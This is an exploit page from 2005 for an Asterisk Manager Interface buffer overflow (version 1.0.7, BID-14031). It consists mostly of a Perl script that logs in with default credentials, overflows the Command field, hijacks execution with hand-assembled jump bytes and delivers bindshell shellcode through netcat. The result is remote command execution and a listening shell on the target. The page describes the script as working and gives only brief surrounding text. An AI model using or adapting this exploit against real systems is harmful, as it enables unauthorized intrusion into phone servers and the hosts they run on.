Asterisk Manager Interface

This working exploit is for the Asterisk Manager Interface Overflow vulnerability. The offset may (is likely to) need changing to match the target operating system.

Vunlerable versions include 1.0.7 and possibly previous versions.

Author

Wade Alcorn

Advisory

Bindshell Advisory
Bugtraq BID-14031

Download

Code

#!/usr/bin/perl

# Title: astman.pl
# Purpose: Remote command execution via Asterisk Manager Interface
# Author: Wade Alcorn <wade@bindshell.net>
# URL: http://www.bindshell.net/exploits/
# Advisory: http://staging.bindshell.net/advisories
#           http://www.securityfocus.com/bid/14031/info
# Copyright: Copyright (C) 2005 Wade Alcorn

# Usage: perl astman.pl | nc <host> <port>
# Note: edit the 'Username' and the 'Secret' parameters below
#       to match the target's username and secret. this vulnerability 
#       affects Asterisk 1.0.7 and has been tested on linux.

$actionlogin =  "Action: login";
$actioncmd =    "Action: Command";
$actionid =     "ActionID: ";
$username =     "Username: mark";   # default username
$secret =       "Secret: mysecret"; # default secret
$sep =          "\r\n";

$overflow = 
"Command: \"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"".
"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"\t\"\"";

# take control of the eip and jump to the start of the "ActionID" 
# param on the stack
$eipcontrol =
"\x54". # push esp
"\x5b". # pop ebx
"\x81\xeb\x01\x01\x01\x01". # sub x01010101 from ebx
"\x81\xc3\x2b\x04\x01\x01". # add x01010101 + 0x0000032b to ebx
"\x89\xd9". # copy ebx to ecx
"\xff\xe1"; # jump to ecx value

#bindshell code (from http://www.metasploit.com/)
$shellcode =
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x95".  
"\x02\xaa\xb7\x83\xeb\xfc\xe2\xf4\xa4\xd9\xf9\xf4\xc6\x68\xa8\xdd".
"\xf3\x5a\x33\x3e\x74\xcf\x2a\x21\xd6\x50\xcc\xdf\x84\x5e\xcc\xe4".
"\x1c\xe3\xc0\xd1\xcd\x52\xfb\xe1\x1c\xe3\x67\x37\x25\x64\x7b\x54".
"\x58\x82\xf8\xe5\xc3\x41\x23\x56\x25\x64\x67\x37\x06\x68\xa8\xee".
"\x25\x3d\x67\x37\xdc\x7b\x53\x07\x9e\x50\xc2\x98\xba\x71\xc2\xdf".
"\xba\x60\xc3\xd9\x1c\xe1\xf8\xe4\x1c\xe3\x67\x37";

print $actionlogin.$sep.$username.$sep.$secret.$sep.$sep.$actioncmd.$sep.
$overflow.$eipcontrol.$sep.$actionid.$shellcode.$sep.$sep.$sep;